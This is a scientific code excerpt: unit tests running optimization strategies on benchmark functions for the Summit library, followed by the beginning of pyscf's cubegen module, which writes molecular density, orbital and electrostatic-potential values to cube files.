inputs, outputs = self.transform.transform_inputs_outputs(previous_results)
objectives = [v for v in self.domain.variables if v.is_objective]
assert len(objectives) == 1
assert objectives[0].name == "scalar_objective"
assert outputs["scalar_objective"].iloc[0] == 70.0
return self.transform.un_transform(inputs)
def reset(self):
pass
domain = Domain()
domain += ContinuousVariable(
name="temperature",
description="reaction temperature in celsius",
bounds=[50, 100],
)
domain += ContinuousVariable(
name="flowrate_a", description="flow of reactant a in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="flowrate_b", description="flow of reactant b in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="yield_", description="", bounds=[0, 100], is_objective=True, maximize=True
)
domain += ContinuousVariable(
name="de",
description="diastereomeric excess",
bounds=[0, 100],
is_objective=True,
maximize=True,
)
columns = [v.name for v in domain.variables]
values = {
("temperature", "DATA"): 60,
("flowrate_a", "DATA"): 0.5,
("flowrate_b", "DATA"): 0.5,
("yield_", "DATA"): 50,
("de", "DATA"): 90,
}
previous_results = DataSet([values], columns=columns)
transform = MultitoSingleObjective(
domain, expression="(yield_+de)/2", maximize=True
)
strategy = MockStrategy(domain, transform=transform)
strategy.suggest_experiments(5, previous_results)
def test_logspaceobjectives_transform():
class MockStrategy(Strategy):
def suggest_experiments(self, num_experiments, previous_results):
inputs, outputs = self.transform.transform_inputs_outputs(previous_results)
objectives = [v for v in self.domain.variables if v.is_objective]
assert len(objectives) == 2
assert np.isclose(outputs["log_yield_"].iloc[0], np.log(50))
assert np.isclose(outputs["log_de"].iloc[0], np.log(90))
return self.transform.un_transform(inputs)
def reset(self):
pass
domain = Domain()
domain += ContinuousVariable(
name="temperature",
description="reaction temperature in celsius",
bounds=[50, 100],
)
domain += ContinuousVariable(
name="flowrate_a", description="flow of reactant a in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="flowrate_b", description="flow of reactant b in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="yield_", description="", bounds=[0, 100], is_objective=True, maximize=True
)
domain += ContinuousVariable(
name="de",
description="diastereomeric excess",
bounds=[0, 100],
is_objective=True,
maximize=True,
)
columns = [v.name for v in domain.variables]
values = {
("temperature", "DATA"): [60, 100],
("flowrate_a", "DATA"): [0.5, 0.4],
("flowrate_b", "DATA"): [0.5, 0.4],
("yield_", "DATA"): [50, 60],
("de", "DATA"): [90, 80],
}
previous_results = DataSet(values, columns=columns)
transform = LogSpaceObjectives(domain)
strategy = MockStrategy(domain, transform=transform)
strategy.suggest_experiments(5, previous_results)
@pytest.mark.parametrize("num_experiments", [1, 2, 4])
@pytest.mark.parametrize("maximize", [True, False])
@pytest.mark.parametrize("constraints", [False])
def test_snobfit(num_experiments, maximize, constraints):
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraints)
strategy = SNOBFIT(hartmann3D.domain, probability_p=0.5, dx_dim=1e-5)
initial_exp = None
    # Uncomment the following lines to start with initial data
# initial_exp = pd.DataFrame(data={'x_1': [0.409,0.112,0.17,0.8], 'x_2': [0.424,0.33,0.252,0.1],
# 'x_3': [0.13,0.3,0.255,0.01]}) # initial experimental points
# initial_exp = DataSet.from_df(initial_exp)
# initial_exp = hartmann3D.run_experiments(initial_exp) # initial results
    # run the SNOBFIT loop for a fixed number of iterations (<num_iter>) with <num_experiments> experiments each
# stop loop if <max_stop> consecutive iterations have not produced an improvement
num_iter = 400 // num_experiments
max_stop = 50 // num_experiments
nstop = 0
fbestold = float("inf")
# Initial experiments
if initial_exp is not None:
next_experiments = initial_exp
else:
next_experiments = None
param = None
for i in range(num_iter):
# Call of SNOBFIT
next_experiments = strategy.suggest_experiments(
num_experiments, prev_res=next_experiments
)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
fbestold = fbest
nstop = 0
else:
nstop += 1
if nstop >= max_stop:
print("No improvement in last " + str(max_stop) + " iterations.")
break
xbest = np.around(xbest, decimals=3)
fbest = np.around(fbest, decimals=3)
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
assert fbest <= -3.85 and fbest >= -3.87
# Test saving and loading
strategy.save("snobfit_test.json")
strategy_2 = SNOBFIT.load("snobfit_test.json")
for a, b in zip(strategy.prev_param[0], strategy_2.prev_param[0]):
if type(a) == list:
assert all(a) == all(b)
elif type(a) == np.ndarray:
assert a.all() == b.all()
elif np.isnan(a):
assert np.isnan(b)
else:
assert a == b
assert all(strategy.prev_param[1][0]) == all(strategy_2.prev_param[1][0])
os.remove("snobfit_test.json")
print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
@pytest.mark.parametrize("x_start", [[], [0, 0], [4, 6], [1, 2], [-2, 5]])
@pytest.mark.parametrize("maximize", [True, False])
@pytest.mark.parametrize("constraint", [True, False])
def test_nm2D(x_start, maximize, constraint, plot=False):
himmelblau = Himmelblau(maximize=maximize, constraints=constraint)
strategy = NelderMead(
himmelblau.domain, x_start=x_start, random_start=True, adaptive=False
) # Will only random start if x_start is []
initial_exp = None
# Uncomment to create test case which results in reduction dimension and dimension recovery
# initial_exp = pd.DataFrame(data={'x_1': [4.0,4.0,2.0], 'x_2': [2.0,3.0,-6.0]})
# initial_exp = DataSet.from_df(initial_exp)
# initial_exp = himmelblau.run_experiments(initial_exp) # initial results
    # run the Nelder-Mead loop for a fixed number of iterations (<num_iter>)
num_iter = 100 # maximum number of iterations
max_stop = 20 # allowed number of consecutive iterations w/o improvement
nstop = 0
fbestold = float("inf")
polygons_points = []
# Initial experiments
if initial_exp is not None:
polygons_points.append(
np.asarray(
[
(
initial_exp.data_to_numpy()[i][:2].tolist(),
initial_exp.data_to_numpy()[j][:2],
)
for i in range(len(initial_exp.data_to_numpy()))
for j in range(len(initial_exp.data_to_numpy()))
]
)
)
next_experiments = initial_exp
else:
next_experiments = None
param = None
for i in range(num_iter):
next_experiments = strategy.suggest_experiments(prev_res=next_experiments)
# This is the part where experiments take place
next_experiments = himmelblau.run_experiments(next_experiments)
# save polygon points for plotting
param = strategy.prev_param
polygons_points.append(
np.asarray(
[param[0]["sim"][i].tolist() for i in range(len(param[0]["sim"]))]
)
)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
fbestold = fbest
nstop = 0
else:
nstop += 1
if nstop >= max_stop:
print("No improvement in last " + str(max_stop) + " iterations.")
break
xbest = np.around(xbest, decimals=3)
fbest = np.around(fbest, decimals=3)
assert fbest <= 0.1
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraints: four identical local minima f = 0 at x1 = (3.000, 2.000),
# x2 = (-2.810, 3.131), x3 = (-3.779, -3.283), x4 = (3.584, -1.848)
# Test saving and loading
strategy.save("nm_2d.json")
strategy_2 = NelderMead.load("nm_2d.json")
assert strategy._x_start == strategy_2._x_start
assert strategy.random_start == strategy_2.random_start
assert strategy._dx == strategy_2._dx
assert strategy._df == strategy_2._df
assert strategy._adaptive == strategy_2._adaptive
p = strategy.prev_param[0]
    p2 = strategy_2.prev_param[0]
for k, v in p.items():
if type(v) not in [list, np.ndarray]:
assert v == p2[k]
elif type(v) == list:
for i, l in enumerate(v):
if type(l) in [np.ndarray, DataSet]:
assert l.all() == p2[k][i].all()
else:
assert l == p2[k][i]
assert all(strategy.prev_param[1]) == all(strategy_2.prev_param[1])
os.remove("nm_2d.json")
# plot
if plot:
fig, ax = himmelblau.plot(polygons=polygons_points)
@pytest.mark.parametrize(
"x_start, maximize, constraint",
[
([0, 0, 0], True, True),
([0, 0, 0], True, False),
([0, 0, 0], False, True),
([0, 0, 0], False, False),
([1, 1, 0.2], True, False),
([1, 1, 0.2], False, False),
([], True, True),
([], True, False),
([], False, True),
([], False, False),
([0.4, 0.2, 0.6], True, True),
([0.4, 0.2, 0.6], True, False),
([0.4, 0.2, 0.6], False, True),
([0.4, 0.2, 0.6], False, False),
],
)
def test_nm3D(maximize, x_start, constraint, plot=False):
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraint)
strategy = NelderMead(hartmann3D.domain, x_start=x_start)
strategy.save("nm_3d.json")
strategy_2 = NelderMead.load("nm_3d.json")
initial_exp = None
# Uncomment to create test case which results in reduction dimension and dimension recovery
# initial_exp = pd.DataFrame(data={'x_1': [0.1,0.1,0.4,0.3], 'x_2': [0.6,0.2,0.4,0.5], 'x_3': [1,1,1,0.3]})
# initial_exp = DataSet.from_df(initial_exp)
# initial_exp = hartmann3D.run_experiments(initial_exp)
    # run the Nelder-Mead loop for a fixed number of iterations (<num_iter>)
num_iter = 200 # maximum number of iterations
max_stop = 20 # allowed number of consecutive iterations w/o improvement
nstop = 0
fbestold = float("inf")
polygons_points = []
# Initial experiments
if initial_exp is not None:
polygons_points.append(
np.asarray(
[
(
initial_exp.data_to_numpy()[i][:3].tolist(),
initial_exp.data_to_numpy()[j][:3],
)
for i in range(len(initial_exp.data_to_numpy()))
for j in range(len(initial_exp.data_to_numpy()))
]
)
)
next_experiments = initial_exp
else:
next_experiments = None
param = None
for i in range(num_iter):
next_experiments = strategy.suggest_experiments(prev_res=next_experiments)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
# save polygon points for plotting
param = strategy.prev_param
polygons_points.append(
np.asarray(
[param[0]["sim"][i].tolist() for i in range(len(param[0]["sim"]))]
)
)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
fbestold = fbest
nstop = 0
else:
nstop += 1
if nstop >= max_stop:
print("No improvement in last " + str(max_stop) + " iterations.")
break
xbest = np.around(xbest, decimals=3)
fbest = np.around(fbest, decimals=3)
print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
# assert (xbest[0] >= 0.113 and xbest[0] <= 0.115) and (xbest[1] >= 0.555 and xbest[1] <= 0.557) and \
# (xbest[2] >= 0.851 and xbest[2] <= 0.853) and (fbest <= -3.85 and fbest >= -3.87)
# Test saving and loading
strategy.save("nm_3d.json")
strategy_2 = NelderMead.load("nm_3d.json")
assert strategy._x_start == strategy_2._x_start
assert strategy._dx == strategy_2._dx
assert strategy._df == strategy_2._df
assert strategy._adaptive == strategy_2._adaptive
p = strategy.prev_param[0]
    p2 = strategy_2.prev_param[0]
for k, v in p.items():
if type(v) not in [list, np.ndarray]:
assert v == p2[k]
elif type(v) == list:
for i, l in enumerate(v):
if type(l) in [np.ndarray, DataSet]:
assert l.all() == p2[k][i].all()
else:
assert l == p2[k][i]
assert all(strategy.prev_param[1]) == all(strategy_2.prev_param[1])
os.remove("nm_3d.json")
if plot:
fig, ax = hartmann3D.plot(polygons=polygons_points)
@pytest.mark.parametrize(
"batch_size, max_num_exp, maximize, constraint",
[
[1, 1, True, True],
[1, 200, True, True],
[4, 200, False, True],
[1, 200, True, False],
[4, 200, False, False],
],
)
def test_sobo(
batch_size, max_num_exp, maximize, constraint, test_num_improve_iter=2, plot=False
):
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraint)
strategy = SOBO(domain=hartmann3D.domain, kernel=GPy.kern.Matern32(3))
    # run the SOBO loop for a fixed number of iterations (<num_iter>)
num_iter = max_num_exp // batch_size # maximum number of iterations
max_stop = (
80 // batch_size
) # allowed number of consecutive iterations w/o improvement
min_stop = (
20 // batch_size
) # minimum number of iterations before algorithm is stopped
nstop = 0
num_improve_iter = 0
fbestold = float("inf")
next_experiments = None
pb = progress_bar(range(num_iter))
for i in pb:
next_experiments = strategy.suggest_experiments(
num_experiments=batch_size, prev_res=next_experiments
)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
if fbest < 0.99 * fbestold or i < min_stop:
nstop = 0
num_improve_iter += 1
else:
nstop += 1
fbestold = fbest
pb.comment = f"Best f value: {fbest} at point: {xbest}"
print("\n")
else:
nstop += 1
if nstop >= max_stop:
print(
"Stopping criterion reached. No improvement in last "
+ str(max_stop)
+ " iterations."
)
break
if fbest < -3.85:
print("Stopping criterion reached. Function value below -3.85.")
break
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
# xbest = np.around(xbest, decimals=3)
# fbest = np.around(fbest, decimals=3)
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
# if check_convergence:
# assert (fbest <= -3.85 and fbest >= -3.87)
# Test saving and loading
strategy.save("sobo_test.json")
strategy_2 = SOBO.load("sobo_test.json")
os.remove("sobo_test.json")
if strategy.prev_param is not None:
assert strategy.prev_param[0].all() == strategy_2.prev_param[0].all()
assert strategy.prev_param[1].all() == strategy_2.prev_param[1].all()
assert strategy.use_descriptors == strategy_2.use_descriptors
assert strategy.gp_model_type == strategy_2.gp_model_type
assert strategy.acquisition_type == strategy_2.acquisition_type
assert strategy.optimizer_type == strategy_2.optimizer_type
assert strategy.evaluator_type == strategy_2.evaluator_type
assert strategy.kernel.to_dict() == strategy_2.kernel.to_dict()
assert strategy.exact_feval == strategy_2.exact_feval
assert strategy.ARD == strategy_2.ARD
assert strategy.standardize_outputs == strategy_2.standardize_outputs
if plot:
fig, ax = hartmann3D.plot()
@pytest.mark.parametrize(
"batch_size, max_num_exp, maximize, constraint",
[
[1, 1, True, True],
[1, 200, True, True],
[4, 200, False, True],
[1, 200, True, False],
[4, 200, False, False],
],
)
def test_mtbo(
batch_size,
max_num_exp,
maximize,
constraint,
test_num_improve_iter=2,
plot=False,
n_pretraining=100,
):
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraint)
# Pretraining data
random = Random(hartmann3D.domain)
conditions = random.suggest_experiments(n_pretraining)
results = hartmann3D.run_experiments(conditions)
results["task", "METADATA"] = 0
strategy = MTBO(domain=hartmann3D.domain, pretraining_data=results)
    # run the MTBO loop for a fixed number of iterations (<num_iter>)
num_iter = max_num_exp // batch_size # maximum number of iterations
max_stop = (
80 // batch_size
) # allowed number of consecutive iterations w/o improvement
min_stop = (
20 // batch_size
) # minimum number of iterations before algorithm is stopped
nstop = 0
num_improve_iter = 0
fbestold = float("inf")
next_experiments = None
pb = progress_bar(range(num_iter))
for i in pb:
next_experiments = strategy.suggest_experiments(
num_experiments=batch_size, prev_res=next_experiments
)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
fbest = strategy.fbest
if fbest < fbestold:
if fbest < 0.99 * fbestold or i < min_stop:
nstop = 0
num_improve_iter += 1
else:
nstop += 1
fbestold = fbest
pb.comment = f"Best f value: {fbest}"
print("\n")
else:
nstop += 1
if nstop >= max_stop:
print(
"Stopping criterion reached. No improvement in last "
+ str(max_stop)
+ " iterations."
)
break
if fbest < -3.85:
print("Stopping criterion reached. Function value below -3.85.")
break
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
# xbest = np.around(xbest, decimals=3)
# fbest = np.around(fbest, decimals=3)
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
# if check_convergence:
# assert (fbest <= -3.85 and fbest >= -3.87)
# Test saving and loading
# strategy.save("sobo_test.json")
# strategy_2 = SOBO.load("sobo_test.json")
# os.remove("sobo_test.json")
if plot:
fig, ax = hartmann3D.plot()
@pytest.mark.parametrize(
"batch_size, max_num_exp, maximize, constraint, test_id",
[[1, 1, True, False, 0], [1, 200, True, False, 1], [4, 200, False, False, 2]],
)
def test_gryffin_himmelblau(
batch_size,
max_num_exp,
maximize,
constraint,
test_id,
test_num_improve_iter=2,
plot=False,
):
himmelblau = Himmelblau(maximize=maximize, constraints=constraint)
strategy = GRYFFIN(domain=himmelblau.domain, sampling_strategies=batch_size)
    # run the Gryffin loop for a fixed number of iterations (<num_iter>)
num_iter = max_num_exp // batch_size # maximum number of iterations
max_stop = (
60 // batch_size
) # allowed number of consecutive iterations w/o improvement
min_stop = 20 // batch_size
nstop = 0
num_improve_iter = 0
fbestold = float("inf")
next_experiments = None
pb = progress_bar(range(num_iter))
for i in pb:
next_experiments = strategy.suggest_experiments(prev_res=next_experiments)
# This is the part where experiments take place
next_experiments = himmelblau.run_experiments(next_experiments)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
if fbest < 0.99 * fbestold or i < min_stop:
nstop = 0
num_improve_iter += 1
else:
nstop += 1
fbestold = fbest
pb.comment = f"Best f value: {fbest} at point: {xbest}"
print("\n")
if nstop >= max_stop:
print("No improvement in last " + str(max_stop) + " iterations.")
break
if fbest < 2:
print("Stopping criterion reached. Function value below 0.5.")
break
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
# xbest = np.around(xbest, decimals=3)
# fbest = np.around(fbest, decimals=3)
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraints: four identical local minima f = 0 at x1 = (3.000, 2.000),
# x2 = (-2.810, 3.131), x3 = (-3.779, -3.283), x4 = (3.584, -1.848)
# assert (fbest <= 2)
# Test saving and loading
save_name = "gryffin_test_himmelblau_" + str(test_id) + ".json"
strategy.save(save_name)
strategy_2 = GRYFFIN.load(save_name)
os.remove(save_name)
if strategy.prev_param is not None:
assert strategy.config_dict == strategy_2.config_dict
assert strategy.prev_param == strategy_2.prev_param
assert strategy.use_descriptors == strategy_2.use_descriptors
if plot:
fig, ax = himmelblau.plot()
@pytest.mark.parametrize(
"batch_size, max_num_exp, maximize, constraint, test_id",
[[1, 1, True, False, 0], [1, 200, True, False, 1], [4, 200, False, False, 2]],
)
def test_gryffin_hartmann(
batch_size,
max_num_exp,
maximize,
constraint,
test_id,
test_num_improve_iter=2,
plot=False,
):
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraint)
strategy = GRYFFIN(domain=hartmann3D.domain, sampling_strategies=batch_size)
    # run the GRYFFIN loop for a fixed number of iterations (<num_iter>)
num_iter = max_num_exp // batch_size # maximum number of iterations
max_stop = (
60 // batch_size
) # allowed number of consecutive iterations w/o improvement
min_stop = 20 // batch_size
nstop = 0
num_improve_iter = 0
fbestold = float("inf")
next_experiments = None
pb = progress_bar(range(num_iter))
for i in pb:
next_experiments = strategy.suggest_experiments(prev_res=next_experiments)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
if fbest < 0.99 * fbestold or i < min_stop:
nstop = 0
num_improve_iter += 1
else:
nstop += 1
fbestold = fbest
pb.comment = f"Best f value: {fbest} at point: {xbest}"
print("\n")
if nstop >= max_stop:
print("No improvement in last " + str(max_stop) + " iterations.")
break
if fbest < -3.5:
print("Stopping criterion reached. Function value below -3.85.")
break
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
pb.comment = f"Best f value: {fbest}"
print("\n")
# xbest = np.around(xbest, decimals=3)
# fbest = np.around(fbest, decimals=3)
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
# assert (fbest <= -3.5 and fbest >= -3.87)
# Test saving and loading
save_name = "gryffin_test_hartmann3D_" + str(test_id) + ".json"
strategy.save(save_name)
strategy_2 = GRYFFIN.load(save_name)
os.remove(save_name)
if strategy.prev_param is not None:
assert strategy.config_dict == strategy_2.config_dict
assert strategy.prev_param == strategy_2.prev_param
assert strategy.use_descriptors == strategy_2.use_descriptors
if plot:
fig, ax = hartmann3D.plot()
def test_tsemo(test_num_improve_iter=2, save=False):
num_inputs = 2
num_objectives = 2
lab = VLMOP2()
strategy = TSEMO(lab.domain)
experiments = strategy.suggest_experiments(5 * num_inputs)
warnings.filterwarnings("ignore", category=RuntimeWarning)
warnings.filterwarnings("ignore", category=DeprecationWarning)
num_improve_iter = 0
best_hv = None
pb = progress_bar(range(20))
for i in pb:
# Run experiments
experiments = lab.run_experiments(experiments)
# Get suggestions
experiments = strategy.suggest_experiments(1, experiments)
if save:
strategy.save("tsemo_settings.json")
y_pareto, _ = pareto_efficient(
lab.data[["y_0", "y_1"]].to_numpy(), maximize=False
)
hv = hypervolume(y_pareto, [11, 11])
        if best_hv is None:
best_hv = hv
elif hv > best_hv:
best_hv = hv
num_improve_iter += 1
pb.comment = f"Hypervolume: {hv}"
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
# assert hv > 117.0
@pytest.mark.parametrize(
"batch_size, max_num_exp, maximize, constraint",
[[1, 1, True, False], [1, 200, True, False], [4, 200, False, False]],
)
def test_entmoot(
batch_size, max_num_exp, maximize, constraint, test_num_improve_iter=2, plot=False
):
# Only run if gurobipy installed
required = {"gurobipy"}
installed = {pkg.key for pkg in pkg_resources.working_set}
missing = required - installed
if missing:
return
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraint)
strategy = ENTMOOT(domain=hartmann3D.domain)
    # run the ENTMOOT loop for a fixed number of iterations (<num_iter>)
num_iter = max_num_exp // batch_size # maximum number of iterations
max_stop = (
80 // batch_size
) # allowed number of consecutive iterations w/o improvement
min_stop = (
20 // batch_size
) # minimum number of iterations before algorithm is stopped
nstop = 0
num_improve_iter = 0
fbestold = float("inf")
next_experiments = None
pb = progress_bar(range(num_iter))
for i in pb:
next_experiments = strategy.suggest_experiments(
num_experiments=batch_size, prev_res=next_experiments
)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
if fbest < 0.99 * fbestold or i < min_stop:
nstop = 0
num_improve_iter += 1
else:
nstop += 1
fbestold = fbest
pb.comment = f"Best f value: {fbest} at point: {xbest}"
print("\n")
else:
nstop += 1
if nstop >= max_stop:
print(
"Stopping criterion reached. No improvement in last "
+ str(max_stop)
+ " iterations."
)
break
if fbest < -3.85:
print("Stopping criterion reached. Function value below -3.85.")
break
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
# xbest = np.around(xbest, decimals=3)
# fbest = np.around(fbest, decimals=3)
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
# if check_convergence:
# assert (fbest <= -3.85 and fbest >= -3.87)
# Test saving and loading
strategy.save("entmoot_test.json")
strategy_2 = ENTMOOT.load("entmoot_test.json")
os.remove("entmoot_test.json")
if strategy.prev_param is not None:
assert strategy.prev_param[0].all() == strategy_2.prev_param[0].all()
assert strategy.prev_param[1].all() == strategy_2.prev_param[1].all()
assert strategy.use_descriptors == strategy_2.use_descriptors
assert strategy.estimator_type == strategy_2.estimator_type
assert strategy.std_estimator_type == strategy_2.std_estimator_type
assert strategy.acquisition_type == strategy_2.acquisition_type
assert strategy.optimizer_type == strategy_2.optimizer_type
assert strategy.generator_type == strategy_2.generator_type
assert strategy.initial_points == strategy_2.initial_points
assert strategy.min_child_samples == strategy_2.min_child_samples
if plot:
fig, ax = hartmann3D.plot()
```
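All of the optimizer tests above repeat the same suggest/run loop; the condensed sketch below isolates that pattern (constructor arguments are copied from `test_snobfit`, and the iteration count is shortened for illustration):
```python
import numpy as np
from summit.benchmarks import Hartmann3D
from summit.strategies import SNOBFIT
exp = Hartmann3D(maximize=False, constraints=False)
strategy = SNOBFIT(exp.domain, probability_p=0.5, dx_dim=1e-5)
suggestions = None
for _ in range(10):  # the real tests run many more iterations with stopping criteria
    suggestions = strategy.suggest_experiments(4, prev_res=suggestions)
    suggestions = exp.run_experiments(suggestions)  # evaluate the benchmark "experiment"
print("best value:", strategy.fbest, "at:", np.around(strategy.xbest, 3))
```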
|
{
"source": "JezsMartinez/pyscf",
"score": 2
}
|
#### File: pyscf/tools/cubegen.py
```python
import time
import numpy
import pyscf
from pyscf import lib
from pyscf import gto
from pyscf import df
from pyscf.dft import numint
from pyscf import __config__
RESOLUTION = getattr(__config__, 'cubegen_resolution', None)
BOX_MARGIN = getattr(__config__, 'cubegen_box_margin', 3.0)
ORIGIN = getattr(__config__, 'cubegen_box_origin', None)
# If given, EXTENT should be a 3-element ndarray/list/tuple to represent the
# extension in x, y, z
EXTENT = getattr(__config__, 'cubegen_box_extent', None)
def density(mol, outfile, dm, nx=80, ny=80, nz=80, resolution=RESOLUTION,
margin=BOX_MARGIN):
"""Calculates electron density and write out in cube format.
Args:
mol : Mole
Molecule to calculate the electron density for.
outfile : str
Name of Cube file to be written.
dm : ndarray
Density matrix of molecule.
Kwargs:
nx : int
Number of grid point divisions in x direction.
            Note this is a function of the molecule's size; a larger molecule
            will have a coarser representation than a smaller one for the
            same value. Conflicts with the resolution keyword.
ny : int
Number of grid point divisions in y direction.
nz : int
Number of grid point divisions in z direction.
resolution: float
Resolution of the mesh grid in the cube box. If resolution is
given in the input, the input nx/ny/nz have no effects. The value
of nx/ny/nz will be determined by the resolution and the cube box
size.
"""
from pyscf.pbc.gto import Cell
cc = Cube(mol, nx, ny, nz, resolution, margin)
GTOval = 'GTOval'
if isinstance(mol, Cell):
GTOval = 'PBC' + GTOval
# Compute density on the .cube grid
coords = cc.get_coords()
ngrids = cc.get_ngrids()
blksize = min(8000, ngrids)
rho = numpy.empty(ngrids)
for ip0, ip1 in lib.prange(0, ngrids, blksize):
ao = mol.eval_gto(GTOval, coords[ip0:ip1])
rho[ip0:ip1] = numint.eval_rho(mol, ao, dm)
rho = rho.reshape(cc.nx,cc.ny,cc.nz)
# Write out density to the .cube file
cc.write(rho, outfile, comment='Electron density in real space (e/Bohr^3)')
return rho
def orbital(mol, outfile, coeff, nx=80, ny=80, nz=80, resolution=RESOLUTION,
margin=BOX_MARGIN):
"""Calculate orbital value on real space grid and write out in cube format.
Args:
mol : Mole
Molecule to calculate the electron density for.
outfile : str
Name of Cube file to be written.
coeff : 1D array
coeff coefficient.
Kwargs:
nx : int
Number of grid point divisions in x direction.
            Note this is a function of the molecule's size; a larger molecule
            will have a coarser representation than a smaller one for the
            same value. Conflicts with the resolution keyword.
ny : int
Number of grid point divisions in y direction.
nz : int
Number of grid point divisions in z direction.
resolution: float
Resolution of the mesh grid in the cube box. If resolution is
given in the input, the input nx/ny/nz have no effects. The value
of nx/ny/nz will be determined by the resolution and the cube box
size.
"""
from pyscf.pbc.gto import Cell
cc = Cube(mol, nx, ny, nz, resolution, margin)
GTOval = 'GTOval'
if isinstance(mol, Cell):
GTOval = 'PBC' + GTOval
# Compute density on the .cube grid
coords = cc.get_coords()
ngrids = cc.get_ngrids()
blksize = min(8000, ngrids)
orb_on_grid = numpy.empty(ngrids)
for ip0, ip1 in lib.prange(0, ngrids, blksize):
ao = mol.eval_gto(GTOval, coords[ip0:ip1])
orb_on_grid[ip0:ip1] = numpy.dot(ao, coeff)
orb_on_grid = orb_on_grid.reshape(cc.nx,cc.ny,cc.nz)
# Write out orbital to the .cube file
cc.write(orb_on_grid, outfile, comment='Orbital value in real space (1/Bohr^3)')
return orb_on_grid
def mep(mol, outfile, dm, nx=80, ny=80, nz=80, resolution=RESOLUTION,
margin=BOX_MARGIN):
"""Calculates the molecular electrostatic potential (MEP) and write out in
cube format.
Args:
mol : Mole
Molecule to calculate the electron density for.
outfile : str
Name of Cube file to be written.
dm : ndarray
Density matrix of molecule.
Kwargs:
nx : int
Number of grid point divisions in x direction.
            Note this is a function of the molecule's size; a larger molecule
            will have a coarser representation than a smaller one for the
            same value. Conflicts with the resolution keyword.
ny : int
Number of grid point divisions in y direction.
nz : int
Number of grid point divisions in z direction.
resolution: float
Resolution of the mesh grid in the cube box. If resolution is
given in the input, the input nx/ny/nz have no effects. The value
of nx/ny/nz will be determined by the resolution and the cube box
size.
"""
cc = Cube(mol, nx, ny, nz, resolution, margin)
coords = cc.get_coords()
# Nuclear potential at given points
Vnuc = 0
for i in range(mol.natm):
r = mol.atom_coord(i)
Z = mol.atom_charge(i)
rp = r - coords
Vnuc += Z / numpy.einsum('xi,xi->x', rp, rp)**.5
# Potential of electron density
Vele = numpy.empty_like(Vnuc)
for p0, p1 in lib.prange(0, Vele.size, 600):
fakemol = gto.fakemol_for_charges(coords[p0:p1])
ints = df.incore.aux_e2(mol, fakemol)
Vele[p0:p1] = numpy.einsum('ijp,ij->p', ints, dm)
MEP = Vnuc - Vele # MEP at each point
MEP = MEP.reshape(cc.nx,cc.ny,cc.nz)
# Write the potential
cc.write(MEP, outfile, 'Molecular electrostatic potential in real space')
return MEP
class Cube(object):
''' Read-write of the Gaussian CUBE files
Attributes:
nx : int
Number of grid point divisions in x direction.
            Note this is a function of the molecule's size; a larger molecule
            will have a coarser representation than a smaller one for the
            same value. Conflicts with the resolution keyword.
ny : int
Number of grid point divisions in y direction.
nz : int
Number of grid point divisions in z direction.
resolution: float
Resolution of the mesh grid in the cube box. If resolution is
given in the input, the input nx/ny/nz have no effects. The value
of nx/ny/nz will be determined by the resolution and the cube box
size. The unit is Bohr.
'''
def __init__(self, mol, nx=80, ny=80, nz=80, resolution=RESOLUTION,
margin=BOX_MARGIN, origin=ORIGIN, extent=EXTENT):
from pyscf.pbc.gto import Cell
self.mol = mol
